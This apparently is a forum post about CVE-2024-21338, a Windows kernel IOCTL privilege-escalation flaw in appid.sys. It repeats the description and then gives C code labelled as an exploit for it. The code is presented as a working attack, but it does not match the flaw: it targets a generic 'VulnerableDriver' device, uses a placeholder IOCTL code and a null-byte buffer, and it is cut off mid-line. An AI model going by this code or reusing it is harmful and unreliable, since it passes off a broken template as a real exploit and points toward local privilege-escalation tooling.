CVE-2024-21338
Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability
Microsoft Windows Kernel contains an exposed IOCTL with insufficient access control vulnerability within the IOCTL (input and output control) dispatcher in appid.sys that allows a local attacker to achieve privilege escalation.
Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability
Microsoft Windows Kernel contains an exposed IOCTL with insufficient access control vulnerability within the IOCTL (input and output control) dispatcher in appid.sys that allows a local attacker to achieve privilege escalation.
کد:
#include <stdio.h> #include <stdlib.h> #include <windows.h> #include <winioctl.h> #define IOCTL_VULNERABLE_DRIVER 0x80001000 /* EXPLOIT CVE-2024-21338 BY E1.Coders Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability */ int main() { HANDLE hDevice; DWORD dwBytesReturned; BOOL bResult; hDevice = CreateFile("\\\\.\\VulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("Failed to open handle to vulnerable driver\n"); return 1; } char exploit_buffer[] = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0 [B][/B]
نظر